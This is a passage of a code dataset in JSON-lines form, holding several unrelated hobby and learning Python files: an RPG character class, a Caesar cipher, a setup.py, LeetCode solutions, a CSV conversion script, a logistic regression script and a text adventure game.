\"\\n\",\n \"Class: \", self.prof, \"\\n\",\n \"Level: \", self.lvl, \"\\n\",\n \"HP: \", self.hp, \"/\", self.maxhp, \"\\n\",\n \"MP: \", self.mp, \"/\", 
self.maxmp, \"\\n\",\n \"AC: \", self.ac_rating(), \"\\n\",\n \"Strength: +\", self.get_str(), \"\\n\",\n \"Dexterity: +\", self.get_dex(), \"\\n\",\n \"Wisdom: +\", self.get_wis(), \"\\n\",\n \"Constitution: +\", self.get_con())\n print(\"You have a {} equipped.\".format(self.items[\"weapon\"].name))\n print(\"You are wearing {}.\".format(self.items[\"armor\"].name))\n print(\"You have {} gold pieces.\".format(self.money))\n print(\"You have the following items in your rucksack:\")\n for item in self.items[\"items\"]:\n print(item.name)\n\n def __del__(self):\n pass\n\n def death_check(self):\n if self.hp <= 0:\n return True\n else:\n pass\n\n def damage(self, enemy):\n if self.items[\"weapon\"].type == \"weapon\":\n val = randint(1, self.items[\"weapon\"].item_value()) + self.get_str()\n if val < 0:\n return 1\n else:\n if self.items[\"weapon\"].elem == \"Magic\":\n if self.attack() + 5 > enemy.ac_rating():\n return val + 10\n else:\n return 0\n elif self.items[\"weapon\"].elem == \"Fire\":\n if self.attack() + 5 > enemy.ac_rating():\n enemy.fire = 5\n return val + 10\n else:\n return 0\n elif self.items[\"weapon\"].elem == \"Death\":\n if self.attack() + 5 > enemy.ac_rating():\n if enemy.will() < self.will():\n a = enemy.hp % 2\n return val + a\n else:\n return val\n else:\n return 0\n else:\n if self.attack() > enemy.ac_rating():\n return val\n else:\n return 0\n elif self.items[\"weapon\"].type == \"staff\":\n print(\"STAFF DAMAGE\")\n if self.items[\"weapon\"].elem == \"Magic\":\n return 10\n elif self.items[\"weapon\"].elem == \"Fire\":\n return 25\n elif self.items[\"weapon\"].elem == \"Death\":\n return 15\n elif self.items[\"weapon\"].elem == \"Alter\":\n return self.will()\n else:\n return randint(1, self.items[\"weapon\"].item_value()) + self.get_str()\n\n def reset(self):\n self.hp = self.maxhp\n self.mp = self.maxmp\n return self.hp, self.mp\n\n def win_gold(self, val):\n self.money += val\n print(\"You have won {}gp.\".format(val))\n return self.money\n\n def spend_gold(self, val):\n self.money -= val\n print(\"You have lost {}gp.\".format(val))\n return self.money\n\n def get_xp(self, val):\n self.xp += val\n return self.xp\n\n def profession(self, val):\n if val == 0:\n self.prof = \"Spellsword\"\n self.wis = 12\n self.dex = 12\n self.magic = sword_magic\n self.items = spellsword_inv\n self.rollover = 10\n self.rollover2 = 10\n self.maxhp = self.rollover + value_mod(self.con) + (self.lvl - 1) * (\n randint(0, self.rollover) + value_mod(self.con))\n self.hp = self.maxhp\n self.maxmp = self.rollover2 + value_mod(self.wis) + (self.lvl - 1) * (\n randint(0, self.rollover2) + value_mod(self.wis))\n self.mp = self.maxmp\n self.reset()\n elif val == 1:\n self.prof = \"Warden\"\n self.str = 12\n self.con = 12\n self.magic = ward_magic\n self.items = warden_inv\n self.rollover = 12\n self.rollover2 = 8\n self.maxhp = self.rollover + value_mod(self.con) + (self.lvl - 1) * (\n randint(0, self.rollover) + value_mod(self.con))\n self.hp = self.maxhp\n self.maxmp = self.rollover2 + value_mod(self.wis) + (self.lvl - 1) * (\n randint(0, self.rollover2) + value_mod(self.wis))\n self.mp = self.maxmp\n self.reset()\n elif val == 2:\n self.prof = \"Sorceror\"\n self.wis = 12\n self.con = 12\n self.magic = sorce_magic\n self.items = sorceror_inv\n self.rollover = 8\n self.rollover2 = 12\n self.maxhp = self.rollover + value_mod(self.con) + (self.lvl - 1) * (\n randint(0, self.rollover) + value_mod(self.con))\n self.hp = self.maxhp\n self.maxmp = self.rollover2 + value_mod(self.wis) + (self.lvl 
- 1) * (\n randint(0, self.rollover2) + value_mod(self.wis))\n self.mp = self.maxmp\n self.reset()\n print(\"You were trained to be a {}!\".format(self.prof))\n return self.prof\n","repo_name":"ersvoid/kingdom-of-aerune-game","sub_path":"Classes/character.py","file_name":"character.py","file_ext":"py","file_size_in_byte":8438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25741948172","text":"# create a program to encode and decode messages using the casear cipher\n# chr - converts a number to a character relevant to the ASCII table\n# ord - converts a character to an ASCII number\n# isalpha - checks if a character is a letter\n\nimport os\n\nlogo = \"\"\" \n ,adPPYba, ,adPPYYba, ,adPPYba, ,adPPYba, ,adPPYYba, 8b,dPPYba, \na8\" \"\" \"\" `Y8 a8P_____88 I8[ \"\" \"\" `Y8 88P' \"Y8 \n8b ,adPPPPP88 8PP\"\"\"\"\"\"\" `\"Y8ba, ,adPPPPP88 88 \n\"8a, ,aa 88, ,88 \"8b, ,aa aa ]8I 88, ,88 88 \n `\"Ybbd8\"' `\"8bbdP\"Y8 `\"Ybbd8\"' `\"YbbdP\"' `\"8bbdP\"Y8 88 \n 88 88 \n \"\" 88 \n 88 \n ,adPPYba, 88 8b,dPPYba, 88,dPPYba, ,adPPYba, 8b,dPPYba, \na8\" \"\" 88 88P' \"8a 88P' \"8a a8P_____88 88P' \"Y8 \n8b 88 88 d8 88 88 8PP\"\"\"\"\"\"\" 88 \n\"8a, ,aa 88 88b, ,a8\" 88 88 \"8b, ,aa 88 \n `\"Ybbd8\"' 88 88`YbbdP\"' 88 88 `\"Ybbd8\"' 88 \n 88 \n 88 \n\"\"\"\n\n\ndef encode(message, shift):\n result = \"\"\n for char in message:\n if char.isalpha():\n if char.isupper():\n char = chr((ord(char)+shift - 65) % 26 + 65)\n else:\n char = chr((ord(char)+shift - 97) % 26 + 97)\n result += char\n else:\n result += char\n\n return result\n\n\ndef decode(message, shift):\n result = \"\"\n for char in message:\n if char.isalpha():\n if char.isupper():\n char = chr((ord(char)-shift - 65) % 26 + 65)\n else:\n char = chr((ord(char)-shift - 97) % 26 + 97)\n result += char\n else:\n result += char\n\n return result\n\n\ndef main():\n print(logo)\n print(\"Would you like to encode or decode a message?\")\n choice = input(\"Enter 'e' to encode or 'd' to decode: \")\n\n try:\n if choice == 'e':\n message = input(\"Enter your message: \")\n shift = int(input(\"Enter the shift value: \"))\n print(\"Your encrypted message is - \")\n print(encode(message, shift))\n\n elif choice == 'd':\n message = input(\"Enter your encrypted message: \")\n shift = int(input(\"Enter the shift value: \"))\n print(\"Your decrypted text is - \")\n print(decode(message, shift))\n else:\n print(\"Please enter a valid choice.\")\n\n except:\n print(\"Please enter a valid choice.\")\n\n print(\"Would you like to go again?\")\n again = input(\"Enter 'y' to go again or 'n' to quit: \")\n try:\n if again == 'y':\n os.system('clear')\n main()\n elif again == 'n':\n os.system('clear')\n print(\"Goodbye\")\n else:\n print(\"Please enter a valid choice.\")\n except:\n print(\"Please enter a valid choice.\")\n\n\nmain()\n","repo_name":"sammybarman/100-Days-of-Python","sub_path":"Day8/caesar_cipher.py","file_name":"caesar_cipher.py","file_ext":"py","file_size_in_byte":3054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6619076973","text":"\nimport os\nfrom setuptools import setup\n\ndef version(modfile):\n '''\n Parse version from module without importing or evaluating the code.\n The module should define a __version__ variable like __version__ = '2.0.1'.\n '''\n import re\n with open(modfile) as fh:\n for line in fh:\n m = re.search(r\"^__version__ = '([^']+)'$\", line)\n if m:\n return m.group(1)\n raise Exception('No __version__ 
string found in {fn}'.format(fn=modfile))\n\nsetup(\n name = 'fabvenv', # pypi project name\n version = version('fabvenv.py'),\n license = 'MIT',\n description = ('A fabric utility for creating remote virtual' +\n ' environments, and installing and updating packages.'),\n long_description = open(os.path.join(os.path.dirname(__file__), \n 'README.md')).read(),\n keywords = ('fabric virtualenv venv utility'),\n url = 'https://github.com/todddeluca/fabvenv',\n author = 'Todd Francis DeLuca',\n author_email = 'todddeluca@yahoo.com',\n classifiers = ['License :: OSI Approved :: MIT License',\n 'Development Status :: 3 - Alpha',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n ],\n py_modules = ['fabvenv'],\n)\n\n","repo_name":"todddeluca/fabvenv","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"70461365266","text":"# ! /usr/bin/env python\n# -*- coding: utf-8 -*-\n__author__ = 'CLH'\n\n'''\n526. Beautiful Arrangement\n Suppose you have N integers from 1 to N.\n We define a beautiful arrangement as an array that is constructed by these N numbers successfully\n if one of the following is true for the ith position (1 <= i <= N) in this array:\n (1) The number at the i-th position is divisible by i.\n (2) i is divisible by the number at the i-th position.\n Now given N, how many beautiful arrangements can you construct?\n'''\n\nclass Solution(object):\n def __init__(self):\n self.N = 0\n self.total_num = 0\n\n def backtrack(self, k):\n if k == self.N:\n self.total_num += 1\n else:\n k = k + 1\n for i in range(1, self.N+1):\n if i % k == 0 or k % i == 0:\n if self.visited[i] == 1:\n continue\n self.visited[i] = 1\n self.backtrack(k)\n self.visited[i] = 0\n if k == self.N:\n return\n\n def countArrangement(self, N):\n \"\"\"\n :type N: int\n :rtype: int\n \"\"\"\n self.N = N\n self.visited = [0]*(N+1)\n self.backtrack(0)\n return self.total_num\n\n\nif __name__ == \"__main__\":\n S = Solution()\n S.countArrangement(15)\n\n\n\n\n\n","repo_name":"clhchtcjj/Algorithm","sub_path":"backtrack/leetcode 526 Beautiful Arrangement.py","file_name":"leetcode 526 Beautiful Arrangement.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"20844639001","text":"import csv\nimport json\nfrom itertools import zip_longest\n\nwith open('../git_scraper/data/github-open-pr_data.json') as f:\n git_pr_data = json.load(f)\n\ngit_pr_url = [item.get('url') for item in git_pr_data]\ngit_pr_contents = [item.get('pr_contents')\n for item in git_pr_data]\ngit_pr_comments = [item.get('pr_comments')\n for item in git_pr_data]\ngit_pr_code = [item.get('pr_code') for item in git_pr_data]\ngit_pr_quotes = [item.get('pr_quotes') for item in git_pr_data]\ngit_pr_details = [item.get('pr_details') for item in git_pr_data]\ngit_pr_details_m = [item.get('pr_details_more') for item in git_pr_data]\ngit_pr_title = [item.get('pr_title') for item in git_pr_data]\ngit_pr_id = []\ngit_pr_battery = []\ngit_pr_energy = []\ngit_pr_sustain = []\ngit_pr_power = []\ngit_pr_green = []\ngit_pr_contents_new = []\ngit_pr_comments_new = []\ngit_pr_code_new = []\ngit_pr_quotes_new = []\ngit_pr_details_new = []\ngit_pr_details_m_new = []\n\ncollection_name = []\nraw_contents = []\n\nz = 28995\nfor i in range(len(git_pr_url)):\n y = \"GitPR\" + str(z)\n git_pr_id.append(y)\n z = 
z + 1\n\nfor i in range(len(git_pr_url)):\n collection_name.append(\"GitHubPRs\")\n\nfor contents in git_pr_contents:\n try:\n contents = ''.join(contents)\n git_pr_contents_new.append(contents)\n except TypeError:\n contents = ''\n git_pr_contents_new.append(contents)\n\nfor comments in git_pr_comments:\n try:\n comments = ''.join(comments)\n git_pr_comments_new.append(comments)\n except TypeError:\n comments = ''\n git_pr_comments_new.append(comments)\n\nfor code in git_pr_code:\n try:\n code = ''.join(code)\n git_pr_code_new.append(code)\n except TypeError:\n code = ''\n git_pr_code_new.append(code)\n\nfor quotes in git_pr_quotes:\n try:\n quotes = ''.join(quotes)\n git_pr_quotes_new.append(quotes)\n except TypeError:\n quotes = ''\n git_pr_quotes_new.append(quotes)\n\nfor details in git_pr_details:\n try:\n details = ''.join(details)\n git_pr_details_new.append(details)\n except TypeError:\n details = ''\n git_pr_details_new.append(details)\n\nfor details_m in git_pr_details_m:\n try:\n details_m = ''.join(details_m)\n git_pr_details_m_new.append(details_m)\n except TypeError:\n details_m = ''\n git_pr_details_m_new.append(details_m)\n\n\n# print(len(git_pr_url))\n# print(len(git_pr_title))\n# print(len(git_pr_contents_new))\n# print(len(git_pr_answer_new))\n# print(len(git_pr_qdetails_new))\n# print(len(git_pr_adetails_new))\n\nfor i in range(1031):\n rcontents = git_pr_contents_new[\n i] + '' + git_pr_code_new[i] + '' + git_pr_comments_new[i] + '' + git_pr_quotes_new[i] + '' + git_pr_details_new[i] + '' + git_pr_details_m_new[i]\n raw_contents.append(rcontents)\n\n# print(len(raw_contents))\n\nraw_contents_final = []\nfor rc in raw_contents:\n other_string = rc[0:90]\n raw_contents_final.append(other_string)\n\ngit_pr_list = [git_pr_id,\n git_pr_url,\n collection_name,\n git_pr_title,\n raw_contents_final\n ]\n\nexport_data = zip_longest(*git_pr_list, fillvalue='')\n\nwith open('data/energy_data.csv', 'a', newline='') as myfile:\n wr = csv.writer(myfile)\n wr.writerows(export_data)\nmyfile.close()\n","repo_name":"S2-group/msr-2021-robotics-green-architectural-tactics-replication-package","sub_path":"RQ1_data_software/phase1_data_collection/data_to_csv/git-prs_to_csv.py","file_name":"git-prs_to_csv.py","file_ext":"py","file_size_in_byte":3357,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"32390947526","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport warnings\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import classification_report\n\nwarnings.filterwarnings(\"ignore\", category=FutureWarning)\n\ntrain=pd.read_csv('totalimplemented_randomized_full_dataset.csv', dtype={\"fullname\": object, \"campus\": object, \"city\": object, \"fall_term\": object,\n \"measure_name\": float, \"school_name\": object, \"ethcat\": object,\n \"total_number\": float, \"ceeb_id\": float, \"gpa\": float, \"status\": object})\ntrain.head()\n\ntrain.isnull()\n\n#sns.heatmap(train.isnull())\n#sns.countplot(x='gpa',hue='measure_name',data=train)\n#sns.heatmap(train.isnull(),yticklabels=False,cbar=False)\n\n# train.info()\n\ntrain.drop(['fullname', 'city', 'school_name', 'ceeb_id', 'status', 'ethcat', 'total_number'], axis=1, inplace=True)\n\ntrain.info()\n\ncampus = pd.get_dummies(train['campus'],drop_first=True)\nfall_term = pd.get_dummies(train['fall_term'],drop_first=True)\ntrain.drop(['campus', 
'fall_term'], axis=1, inplace=True)\ntrain = pd.concat([train, campus, fall_term],axis=1)\n\n# train.info()\n\nX_train, X_test, y_train, y_test = train_test_split(train.drop('measure_name', axis=1),\n                                                    train['measure_name'], test_size=0.20,\n                                                    random_state=101)\n\nlogmodel = LogisticRegression()\nlogmodel.fit(X_train, y_train)\n\npredictions = logmodel.predict(X_test)\n\n\nprint(classification_report(y_test, predictions))\n","repo_name":"hannarakhsha/Machine-Learning","sub_path":"OCR-Project/LogRegImplementation.py","file_name":"LogRegImplementation.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22869439600","text":"from Room import Room\r\nfrom TextUI import TextUI\r\nfrom Player import Player\r\nfrom Recipe import Recipe\r\n\r\n\"\"\"\r\n    This class is the main class of the \"Dark Recipe Adventure\" application. \r\n    'Dark Recipe Adventure' is a text-based adventure game. Users \r\n    can walk around some scenery, collect materials, and use them. \r\n    \r\n    To play this game, create an instance of this class and call the \"play\"\r\n    method.\r\n\r\n    This main class creates and initialises all the others: it creates all\r\n    rooms, creates all recipes, creates the parser and starts the game. \r\n    It also evaluates and executes the commands that the parser returns.\r\n    \r\n    This game is adapted from the 'World of Zuul' by Michael Kolling\r\n    and David J. Barnes. The original was written in Java and has been\r\n    simplified and converted to Python by Kingsley Sage\r\n\"\"\"\r\nclass Game:\r\n\r\n    def __init__(self):\r\n        \"\"\"\r\n        Initialises the game\r\n        \"\"\"\r\n        self.textUI = TextUI()\r\n        self.player = Player()\r\n        # self.createRecipes()\r\n        self.myRecipe = {} # to store player's own recipes\r\n\r\n    def createRecipes(self):\r\n        \"\"\"set all recipes of game\"\"\"\r\n        self.recipes = Recipe()\r\n        self.recipes.setRecipe(('m1','m3','m9'),'r1_hot_fart_pot','has fart smell')\r\n        self.recipes.setRecipe(('m2','m8'),'r2_rose_fish','can become a handsome fish')\r\n        self.recipes.setRecipe(('m4','m5','m6'),'r3_stinky_durian_pizza','let\\'s hammer the durian')\r\n        self.recipes.setRecipe(('m2','m6','m10'),'r4_banana_peel_juice','What does banana peel taste like')\r\n        self.recipes.setRecipe(('m4','m7'),'r5_stinky_egg_fried_rice','flies around the food')\r\n        self.recipes.setRecipe(('m1','m3','m5','m7','m10'),'r6_eyeball_meta','eyeball is expensive')\r\n        self.recipes.setRecipe(('m6','m6','m8'),'r7_cactus_salad','full of thorns')\r\n        self.recipes.setRecipe(('m7',),'r8_black_ice_cream','maybe made of oil')\r\n        self.recipes.setRecipe(('m1','m2', 'm2', 'm9'),'r9_red_crab_burger','escaped from SpongeBob SquarePants')\r\n        self.recipes.setRecipe(('m2','m5','m6','m6','m7'),'r10_onion_watermelon','chef\\'s special in university')\r\n        self.recipes.setRecipe(('m5',), 'r11_chicken_shit', 'a chicken that looks like shit')\r\n        self.recipes.setRecipe(('m2','m4','m6','m8','m10'), 'r12_canned_herring', 'famous for smelly')\r\n\r\n    # def createPlayer(self):\r\n    #     self.player = Player()\r\n\r\n    def createRooms(self):\r\n        \"\"\"\r\n        Sets up all room assets\r\n        :return: None\r\n        \"\"\"\r\n        self.kitchen = Room(\"in Kitchen, wow a magic pot\")\r\n\r\n        # initial location\r\n        self.currentRoom = self.kitchen\r\n\r\n        self.bridge = Room(\"on the Bridge\")\r\n        self.l1 = Room(\"Land1\")\r\n        self.l2 = Room(\"Land2\")\r\n        self.l3 = Room(\"Land3\")\r\n        self.l4 = Room(\"Land4\")\r\n        self.l5 = Room(\"Land5\")\r\n        self.tunnel = Room(\"in 
the sea Tunnel\")\r\n self.s1 = Room(\"Sea1\")\r\n self.s2 = Room(\"Sea2\")\r\n self.s3 = Room(\"Sea3\")\r\n self.s4 = Room(\"Sea4\")\r\n\r\n self.kitchen.setExit(\"east\", self.bridge)\r\n self.bridge.setExit(\"east\", self.l1)\r\n self.bridge.setExit(\"west\", self.kitchen)\r\n self.l1.setExit(\"east\", self.l2)\r\n self.l1.setExit(\"north\", self.l3)\r\n self.l1.setExit(\"west\", self.bridge)\r\n self.l2.setExit(\"west\", self.l1)\r\n self.l2.setExit(\"north\", self.l4)\r\n self.l2.setExit(\"south\", self.tunnel)\r\n self.l3.setExit(\"south\", self.l1)\r\n self.l3.setExit(\"east\", self.l4)\r\n self.l4.setExit(\"east\", self.l5)\r\n self.l4.setExit(\"south\", self.l2)\r\n self.l4.setExit(\"west\", self.l3)\r\n self.l5.setExit(\"west\", self.l4)\r\n self.tunnel.setExit(\"up\", self.l2)\r\n self.tunnel.setExit(\"down\", self.s1)\r\n self.s1.setExit(\"north\", self.tunnel)\r\n self.s1.setExit(\"south\", self.s3)\r\n self.s2.setExit(\"east\", self.s3)\r\n self.s3.setExit(\"west\", self.s2)\r\n self.s3.setExit(\"north\", self.s1)\r\n self.s3.setExit(\"east\", self.s4)\r\n self.s4.setExit(\"west\", self.s3)\r\n\r\n \"\"\"\r\n set items in specific rooms\r\n consider changing setItem(str) to setItem(list)\r\n \"\"\"\r\n # self.kitchen.setItem('pot')\r\n self.l1.setItem('m1')\r\n # self.l2.setItem('bonus scene')\r\n self.l3.setItem('m2')\r\n self.l3.setItem('m2')\r\n self.l4.setItem('m3')\r\n self.l5.setItem('m4')\r\n self.l5.setItem('m5')\r\n self.s1.setItem('m6')\r\n self.s1.setItem('m6')\r\n self.s1.setItem('m7')\r\n self.s2.setItem('m9')\r\n self.s2.setItem('m10')\r\n self.s3.setItem('m8')\r\n # self.s3.setItem('key')\r\n # self.s4.setItem('shift point')\r\n # self.s4.setItem('bonus scene')\r\n\r\n def play(self):\r\n \"\"\"\r\n The main play loop\r\n :return: None\r\n \"\"\"\r\n self.printWelcome()\r\n # prompt starting point\r\n self.textUI.printtoTextUI(self.currentRoom.getLongDescription())\r\n finished = False\r\n while (finished == False):\r\n command = self.textUI.getCommand() # Returns a 2-tuple\r\n finished = self.processCommand(command)\r\n\r\n print(\"Thank you for playing!\")\r\n\r\n def printWelcome(self):\r\n \"\"\"\r\n Displays a welcome message\r\n :return:\r\n \"\"\"\r\n self.textUI.printtoTextUI(\"A dark recipe space, around the magic complex, amazing materials.\")\r\n self.textUI.printtoTextUI(\"Mix materials in the pot to get your recipes.\")\r\n self.textUI.printtoTextUI(f'Your command words are: {self.showCommandWords()}')\r\n self.textUI.printtoTextUI(\"\")\r\n\r\n def showCommandWords(self):\r\n \"\"\"\r\n Show a list of available commands\r\n :return: None\r\n \"\"\"\r\n return ['help', 'go', 'kitchen', 'pick', 'drop', 'check', 'mix', 'quit']\r\n # help: describe playing ways (command)\r\n # go: type go [direction] , direction case sensitive\r\n # kitchen: shift to kitchen instantly\r\n # pick/drop material or key, materials case sensitive\r\n # mix: mix 1 to 5 material to create recipes, materials case sensitive\r\n # check: check the contents of backpack, the recipes created by player\r\n # quit: finish game\r\n\r\n def processCommand(self, command):\r\n \"\"\"\r\n Process a command from the TextUI\r\n :param command: a 2-tuple of the form (commandWord, secondWord)\r\n :return: True if the game has been quit, False otherwise\r\n \"\"\"\r\n # change: secondWord means other words\r\n commandWord, otherWords = command\r\n if commandWord != None:\r\n commandWord = commandWord.upper()\r\n\r\n wantToQuit = False\r\n if commandWord == \"HELP\":\r\n self.doPrintHelp()\r\n 
elif commandWord == \"GO\":\r\n self.doGoCommand(otherWords)\r\n elif commandWord == \"KITCHEN\":\r\n self.doKitchenCommand()\r\n elif commandWord == \"PICK\":\r\n self.doPickCommand(otherWords)\r\n elif commandWord == \"DROP\":\r\n self.doDropCommand(otherWords)\r\n elif commandWord == \"CHECK\":\r\n self.doCheckCommand()\r\n elif commandWord == \"MIX\":\r\n self.doMixCommand(otherWords)\r\n elif commandWord == \"QUIT\":\r\n wantToQuit = True\r\n else:\r\n # Unknown command ...\r\n self.textUI.printtoTextUI(\"Don't know what you mean\")\r\n\r\n return wantToQuit\r\n\r\n def doPrintHelp(self):\r\n \"\"\"\r\n Display some useful help text\r\n :return: None\r\n \"\"\"\r\n self.textUI.printtoTextUI(\"A dark recipe space, around the magic complex, amazing materials.\")\r\n self.textUI.printtoTextUI(\"Mix materials in the pot to get your recipes.\")\r\n self.textUI.printtoTextUI(f'Your command words are: {self.showCommandWords()}')\r\n\r\n def doGoCommand(self, otherWords):\r\n \"\"\"\r\n Performs the GO command\r\n :param secondWord: the direction the player wishes to travel in\r\n :return: None\r\n \"\"\"\r\n # change: secondWord means other words\r\n if otherWords == None:\r\n # Missing second word ...\r\n self.textUI.printtoTextUI(\"Go where?\")\r\n return\r\n # getExit: function of class Room\r\n # nextRoom = self.currentRoom.getExit(otherWords[0].lower())\r\n # \"\"\".lower(): make direction input be lower case, case insensitive\"\"\"\r\n nextRoom = self.currentRoom.getExit(otherWords[0])\r\n if nextRoom == None:\r\n self.textUI.printtoTextUI(\"There is no door!\")\r\n else:\r\n self.currentRoom = nextRoom\r\n self.textUI.printtoTextUI(self.currentRoom.getLongDescription())\r\n\r\n def doKitchenCommand(self):\r\n self.currentRoom = self.kitchen\r\n self.textUI.printtoTextUI(self.currentRoom.getLongDescription())\r\n\r\n def doPickCommand(self, otherWords):\r\n \"\"\"\r\n Performs the PICK command\r\n :param otherWords: otherWords[0] is the item the player wishes to pick in backpack\r\n :return: None\r\n \"\"\"\r\n try:\r\n\r\n if self.player.checkPackSize() == False:\r\n raise FullPackError()\r\n # self.textUI.printtoTextUI(\"The backpack is full, need to drop items\")\r\n # return\r\n elif otherWords == None:\r\n # Missing second word ...\r\n raise MissPickItemError()\r\n # self.textUI.printtoTextUI(\"Pick what?\")\r\n # return\r\n elif otherWords[0] in self.currentRoom.getItems():\r\n self.player.pickItem(otherWords[0])\r\n self.currentRoom.removeItem(otherWords[0])\r\n return f'Success pick!', self.doCheckCommand()\r\n raise NotInRoomError()\r\n # else:\r\n # self.textUI.printtoTextUI(f'No {otherWords[0]} here')\r\n except FullPackError:\r\n self.textUI.printtoTextUI(\"The backpack is full, need to drop items\")\r\n return \"The backpack is full, need to drop items\"\r\n except MissPickItemError:\r\n self.textUI.printtoTextUI(\"Pick what?\")\r\n return \"Pick what?\"\r\n except NotInRoomError:\r\n self.textUI.printtoTextUI(f'No {otherWords[0]} here')\r\n return f'No {otherWords[0]} here'\r\n\r\n # if self.player.checkPackSize() == False:\r\n # raise (backpackFullError)\r\n # self.textUI.printtoTextUI(\"The backpack is full, need to drop items\")\r\n # return\r\n # elif otherWords == None:\r\n # # Missing second word ...\r\n # self.textUI.printtoTextUI(\"Pick what?\")\r\n # return\r\n # elif otherWords[0] in self.currentRoom.getItems():\r\n # self.player.pickItem(otherWords[0])\r\n # self.currentRoom.removeItem(otherWords[0])\r\n # self.doCheckCommand()\r\n # else:\r\n # 
self.textUI.printtoTextUI(f'No {otherWords[0]} here')\r\n\r\n    def doDropCommand(self, otherWords):\r\n        \"\"\"\r\n        Performs the DROP command\r\n        :param otherWords: the item the player wishes to drop from the backpack and leave in the current room\r\n        :return: None\r\n        \"\"\"\r\n        try:\r\n            if otherWords == None:\r\n                # Missing second word ...\r\n                raise MissDropItemError()\r\n                # self.textUI.printtoTextUI(\"Drop what?\")\r\n                # return\r\n            elif otherWords[0] in self.player.backpack:\r\n                self.player.dropItem(otherWords[0])\r\n                self.currentRoom.addItem(otherWords[0])\r\n                return f'Success drop!', self.doCheckCommand()\r\n            raise NotInPackError()\r\n            # else:\r\n            #     self.textUI.printtoTextUI(f'no {otherWords[0]} in backpack')\r\n        except MissDropItemError:\r\n            self.textUI.printtoTextUI(\"Drop what?\")\r\n            return \"Drop what?\"\r\n        except NotInPackError:\r\n            self.textUI.printtoTextUI(f'no {otherWords[0]} in backpack')\r\n            return f'no {otherWords[0]} in backpack'\r\n\r\n        # if otherWords == None:\r\n        #     # Missing second word ...\r\n        #     self.textUI.printtoTextUI(\"Drop what?\")\r\n        #     return\r\n        # elif otherWords[0] in self.player.backpack:\r\n        #     self.player.dropItem(otherWords[0])\r\n        #     self.currentRoom.addItem(otherWords[0])\r\n        #     self.doCheckCommand()\r\n        # else:\r\n        #     self.textUI.printtoTextUI(f'no {otherWords[0]} in backpack')\r\n\r\n    def doCheckCommand(self):\r\n        '''check the contents of the player's backpack'''\r\n        contents = self.player.checkPack()\r\n        self.textUI.printtoTextUI(contents)\r\n        self.textUI.printtoTextUI(f'My recipes: {self.myRecipe}')\r\n        return (f'{contents}',f'My recipes: {self.myRecipe}')\r\n\r\n    def doMixCommand(self, otherWords):\r\n        \"\"\"mix 1 to 5 materials, try to cook new recipes\"\"\"\r\n        if self.currentRoom != self.kitchen:\r\n            self.textUI.printtoTextUI(\"Need to go to the kitchen, can type 'kitchen' to shift\")\r\n            return \"Need to go to the kitchen, can click the bottom 'kitchen' button to shift\"\r\n        elif otherWords == None:\r\n            # Missing second word ...\r\n            self.textUI.printtoTextUI(\"Mix what materials?\")\r\n            return \"Mix what materials?\"\r\n        for material in otherWords:\r\n            for item in self.player.backpack:\r\n                if material == item:\r\n                    break\r\n            else:\r\n                self.textUI.printtoTextUI(f'No {material} in backpack')\r\n                return f'No {material} in backpack'\r\n        else:\r\n            otherWords.sort() # materials list\r\n            materials = otherWords\r\n            for recipeMat in list(self.recipes.getAllMaterials()): # recipe keys of dictionary\r\n                recipeMatList = list(recipeMat)\r\n                recipeMatList.sort()\r\n                if materials == recipeMatList:\r\n                    self.myRecipe[recipeMat] = self.recipes.getProduct(recipeMat)\r\n                    self.textUI.printtoTextUI(f'Successfully got {self.myRecipe[recipeMat]}!')\r\n                    self.textUI.printtoTextUI(f'you can continue playing or quit')\r\n                    \"\"\"remove used materials from backpack\"\"\"\r\n                    while materials:\r\n                        self.player.dropItem(materials.pop())\r\n                    return f'Successfully got {self.myRecipe[recipeMat]}!\\n'\\\r\n                           f'you can continue playing or quit'\r\n            else:\r\n                self.textUI.printtoTextUI(f'No recipe cooked, please try again~')\r\n                return f'No recipe cooked, please try again~'\r\n\r\nclass FullPackError(Exception):\r\n    def __init__(self):\r\n        pass\r\nclass MissPickItemError(Exception):\r\n    def __init__(self):\r\n        pass\r\nclass NotInRoomError(Exception):\r\n    def __init__(self):\r\n        pass\r\nclass MissDropItemError(Exception):\r\n    def __init__(self):\r\n        pass\r\nclass NotInPackError(Exception):\r\n    def __init__(self):\r\n        pass\r\n\r\ndef main():\r\n    game = Game()\r\n    game.createRooms()\r\n    
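# NOTE: createRecipes() must run before play(); doMixCommand reads self.recipes, which is only assigned there (the call in __init__ is commented out).\r\n    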
game.createRecipes()\r\n game.play()\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"scdow/Dark-recipe-adventure","sub_path":"DarkRecipeAdventure/Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":15392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15656573125","text":"class Solution:\n def expand(self, S: str) -> List[str]:\n # clarify questions:\n # within each brace, are there duplicated letters? - no. list is fine \n # is it always single letter? - yes\n \n # recursive - each recursive call takes care of one position\n # if the current position is {, search for } and split by ,\n # for each element, call the remaining after } with updated prefix\n # if current position is not {, update the prefix\n # then recursively call the remaining string\n\n if S == '':\n return ['']\n words = []\n \n def breakBrace(prefix, resStr):\n if not resStr:\n if len(prefix) > 0:\n words.append(prefix)\n return\n if resStr[0] == '{':\n end = resStr.find('}')\n for element in resStr[1:end].split(','):\n breakBrace(prefix + element, resStr[end+1:])\n else:\n breakBrace(prefix + resStr[0], resStr[1:])\n \n breakBrace('', S)\n return sorted(words)\n\nsolution = Solution()\ntest1 = '{a,b,c}{e,d}'\ntest2 = '{}'\ntest3 = 